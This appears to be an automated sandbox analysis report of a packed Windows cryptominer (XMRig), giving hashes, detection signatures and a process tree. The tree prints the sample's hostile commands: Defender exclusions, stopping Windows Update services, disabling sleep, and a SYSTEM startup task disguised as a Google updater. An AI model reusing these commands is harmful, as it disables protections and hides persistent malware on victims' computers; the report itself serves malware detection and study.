Analysis
-
max time kernel
300s -
max time network
282s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system -
submitted
02/08/2023, 03:48
Behavioral task
behavioral1
Sample
87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe
Resource
win7-20230712-en
General
-
Target
87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe
-
Size
9.7MB
-
MD5
888f9ab3f2e7e689492fbe05019e4296
-
SHA1
c6981bf46421e55c6ea2274f92a986ae5c98f46a
-
SHA256
87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d
-
SHA512
1a8fe21cf8bd5708f7142297819020c86387761a82a6de389f3747980ffe839f637274c65bc89a0c22c0ae5a5512d774b48ada2a9dc837363b6e2bfac6c02204
-
SSDEEP
196608:yVrXqC+rwTkY5bwvWZcni3sGbrTbwmBbhAYhKKjeluAgZ7vLb:cbqCZ7cWZci3xbrvJphAGWu5Vv/
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 4028 created 3240 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 46 PID 4028 created 3240 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 46 PID 4028 created 3240 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 46 PID 4028 created 3240 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 46 PID 4028 created 3240 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 46 PID 4112 created 3240 4112 updater.exe 46 PID 4112 created 3240 4112 updater.exe 46 PID 4112 created 3240 4112 updater.exe 46 PID 4112 created 3240 4112 updater.exe 46 PID 4112 created 3240 4112 updater.exe 46 PID 4112 created 3240 4112 updater.exe 46 -
XMRig Miner payload 23 IoCs
resource yara_rule behavioral2/memory/4112-693-0x00007FF639320000-0x00007FF63A53F000-memory.dmp xmrig behavioral2/memory/1740-697-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-699-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-701-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-703-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-705-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-707-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-709-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-711-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-713-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-715-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-717-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-719-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-721-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-723-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-725-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-727-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-729-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-731-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-733-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-735-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-737-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig behavioral2/memory/1740-739-0x00007FF6DAB80000-0x00007FF6DB36F000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
pid Process 4112 updater.exe -
resource yara_rule behavioral2/memory/4028-117-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp themida behavioral2/memory/4028-118-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp themida behavioral2/memory/4028-120-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp themida behavioral2/memory/4028-121-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp themida behavioral2/memory/4028-122-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp themida behavioral2/memory/4028-123-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp themida behavioral2/memory/4028-124-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp themida behavioral2/memory/4028-125-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp themida behavioral2/memory/4028-150-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp themida behavioral2/memory/4028-227-0x00007FF7F2DD0000-0x00007FF7F3FEF000-memory.dmp themida behavioral2/files/0x000900000001afab-229.dat themida behavioral2/memory/4112-230-0x00007FF639320000-0x00007FF63A53F000-memory.dmp themida behavioral2/memory/4112-231-0x00007FF639320000-0x00007FF63A53F000-memory.dmp themida behavioral2/memory/4112-233-0x00007FF639320000-0x00007FF63A53F000-memory.dmp themida behavioral2/memory/4112-234-0x00007FF639320000-0x00007FF63A53F000-memory.dmp themida behavioral2/memory/4112-235-0x00007FF639320000-0x00007FF63A53F000-memory.dmp themida behavioral2/memory/4112-236-0x00007FF639320000-0x00007FF63A53F000-memory.dmp themida behavioral2/memory/4112-237-0x00007FF639320000-0x00007FF63A53F000-memory.dmp themida behavioral2/memory/4112-238-0x00007FF639320000-0x00007FF63A53F000-memory.dmp themida behavioral2/memory/4112-652-0x00007FF639320000-0x00007FF63A53F000-memory.dmp themida behavioral2/files/0x000900000001afab-691.dat themida behavioral2/memory/4112-693-0x00007FF639320000-0x00007FF63A53F000-memory.dmp themida -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 4112 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4112 set thread context of 4136 4112 updater.exe 108 PID 4112 set thread context of 1740 4112 updater.exe 109 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4888 sc.exe 1588 sc.exe 1012 sc.exe 4892 sc.exe 3424 sc.exe 1860 sc.exe 2700 sc.exe 2212 sc.exe 4076 sc.exe 2148 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 3712 powershell.exe 3712 powershell.exe 3712 powershell.exe 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 4028 87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe 4112 updater.exe 4112 updater.exe 984 powershell.exe 984 powershell.exe 984 powershell.exe 4112 updater.exe 4112 updater.exe 4112 updater.exe 4112 updater.exe 4112 updater.exe 4112 updater.exe 792 powershell.exe 792 powershell.exe 792 powershell.exe 4112 updater.exe 4112 updater.exe 4112 updater.exe 4112 updater.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe 1740 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 604 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3712 powershell.exe Token: SeIncreaseQuotaPrivilege 3712 powershell.exe Token: SeSecurityPrivilege 3712 powershell.exe Token: SeTakeOwnershipPrivilege 3712 powershell.exe Token: SeLoadDriverPrivilege 3712 powershell.exe Token: SeSystemProfilePrivilege 3712 powershell.exe Token: SeSystemtimePrivilege 3712 powershell.exe Token: SeProfSingleProcessPrivilege 3712 powershell.exe Token: SeIncBasePriorityPrivilege 3712 powershell.exe Token: SeCreatePagefilePrivilege 3712 powershell.exe Token: SeBackupPrivilege 3712 powershell.exe Token: SeRestorePrivilege 3712 powershell.exe Token: SeShutdownPrivilege 3712 powershell.exe Token: SeDebugPrivilege 3712 powershell.exe Token: SeSystemEnvironmentPrivilege 3712 powershell.exe Token: SeRemoteShutdownPrivilege 3712 powershell.exe Token: SeUndockPrivilege 3712 powershell.exe Token: SeManageVolumePrivilege 3712 powershell.exe Token: 33 3712 powershell.exe Token: 34 3712 powershell.exe Token: 35 3712 powershell.exe Token: 36 3712 powershell.exe Token: SeShutdownPrivilege 2252 powercfg.exe Token: SeCreatePagefilePrivilege 2252 powercfg.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeShutdownPrivilege 1956 powercfg.exe Token: SeCreatePagefilePrivilege 1956 powercfg.exe Token: SeShutdownPrivilege 2404 powercfg.exe Token: SeCreatePagefilePrivilege 2404 powercfg.exe Token: SeShutdownPrivilege 980 powercfg.exe Token: SeCreatePagefilePrivilege 980 powercfg.exe Token: SeIncreaseQuotaPrivilege 4348 powershell.exe Token: SeSecurityPrivilege 4348 powershell.exe Token: SeTakeOwnershipPrivilege 4348 powershell.exe Token: SeLoadDriverPrivilege 4348 powershell.exe Token: SeSystemProfilePrivilege 4348 powershell.exe Token: SeSystemtimePrivilege 4348 powershell.exe Token: SeProfSingleProcessPrivilege 4348 powershell.exe Token: SeIncBasePriorityPrivilege 4348 powershell.exe Token: SeCreatePagefilePrivilege 4348 powershell.exe Token: SeBackupPrivilege 4348 powershell.exe Token: SeRestorePrivilege 4348 powershell.exe Token: SeShutdownPrivilege 4348 powershell.exe Token: SeDebugPrivilege 4348 powershell.exe Token: SeSystemEnvironmentPrivilege 4348 powershell.exe Token: SeRemoteShutdownPrivilege 4348 powershell.exe Token: SeUndockPrivilege 4348 powershell.exe Token: SeManageVolumePrivilege 4348 powershell.exe Token: 33 4348 powershell.exe Token: 34 4348 powershell.exe Token: 35 4348 powershell.exe Token: 36 4348 powershell.exe Token: SeIncreaseQuotaPrivilege 4348 powershell.exe Token: SeSecurityPrivilege 4348 powershell.exe Token: SeTakeOwnershipPrivilege 4348 powershell.exe Token: SeLoadDriverPrivilege 4348 powershell.exe Token: SeSystemProfilePrivilege 4348 powershell.exe Token: SeSystemtimePrivilege 4348 powershell.exe Token: SeProfSingleProcessPrivilege 4348 powershell.exe Token: SeIncBasePriorityPrivilege 4348 powershell.exe Token: SeCreatePagefilePrivilege 4348 powershell.exe Token: SeBackupPrivilege 4348 powershell.exe Token: SeRestorePrivilege 4348 powershell.exe Token: SeShutdownPrivilege 4348 powershell.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 864 wrote to memory of 4888 864 cmd.exe 74 PID 864 wrote to memory of 4888 864 cmd.exe 74 PID 864 wrote to memory of 1860 864 cmd.exe 75 PID 864 wrote to memory of 1860 864 cmd.exe 75 PID 864 wrote to memory of 1588 864 cmd.exe 76 PID 864 wrote to memory of 1588 864 cmd.exe 76 PID 864 wrote to memory of 2700 864 cmd.exe 77 PID 864 wrote to memory of 2700 864 cmd.exe 77 PID 864 wrote to memory of 2212 864 cmd.exe 78 PID 864 wrote to memory of 2212 864 cmd.exe 78 PID 2232 wrote to memory of 2252 2232 cmd.exe 83 PID 2232 wrote to memory of 2252 2232 cmd.exe 83 PID 2232 wrote to memory of 1956 2232 cmd.exe 84 PID 2232 wrote to memory of 1956 2232 cmd.exe 84 PID 2232 wrote to memory of 2404 2232 cmd.exe 85 PID 2232 wrote to memory of 2404 2232 cmd.exe 85 PID 2232 wrote to memory of 980 2232 cmd.exe 86 PID 2232 wrote to memory of 980 2232 cmd.exe 86 PID 1492 wrote to memory of 1012 1492 cmd.exe 95 PID 1492 wrote to memory of 1012 1492 cmd.exe 95 PID 1492 wrote to memory of 4076 1492 cmd.exe 96 PID 1492 wrote to memory of 4076 1492 cmd.exe 96 PID 1492 wrote to memory of 4892 1492 cmd.exe 97 PID 1492 wrote to memory of 4892 1492 cmd.exe 97 PID 1492 wrote to memory of 2148 1492 cmd.exe 98 PID 1492 wrote to memory of 2148 1492 cmd.exe 98 PID 1492 wrote to memory of 3424 1492 cmd.exe 99 PID 1492 wrote to memory of 3424 1492 cmd.exe 99 PID 4468 wrote to memory of 2976 4468 cmd.exe 104 PID 4468 wrote to memory of 2976 4468 cmd.exe 104 PID 4468 wrote to memory of 1484 4468 cmd.exe 105 PID 4468 wrote to memory of 1484 4468 cmd.exe 105 PID 4468 wrote to memory of 3996 4468 cmd.exe 106 PID 4468 wrote to memory of 3996 4468 cmd.exe 106 PID 4468 wrote to memory of 2168 4468 cmd.exe 107 PID 4468 wrote to memory of 2168 4468 cmd.exe 107 PID 4112 wrote to memory of 4136 4112 updater.exe 108 PID 4112 wrote to memory of 1740 4112 updater.exe 109
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3240
-
C:\Users\Admin\AppData\Local\Temp\87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe"C:\Users\Admin\AppData\Local\Temp\87e3567cf024f369e6bbdf3def3f67d6fe56c8c68ee842bee2611e8ef59b875d.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:4028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4888
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1860
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1588
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2700
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2212
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#adjkzr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:4464
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:984
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1012
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4076
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4892
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2148
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3424
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2976
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1484
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3996
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:2168
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#adjkzr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:792
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:4136
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1740
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
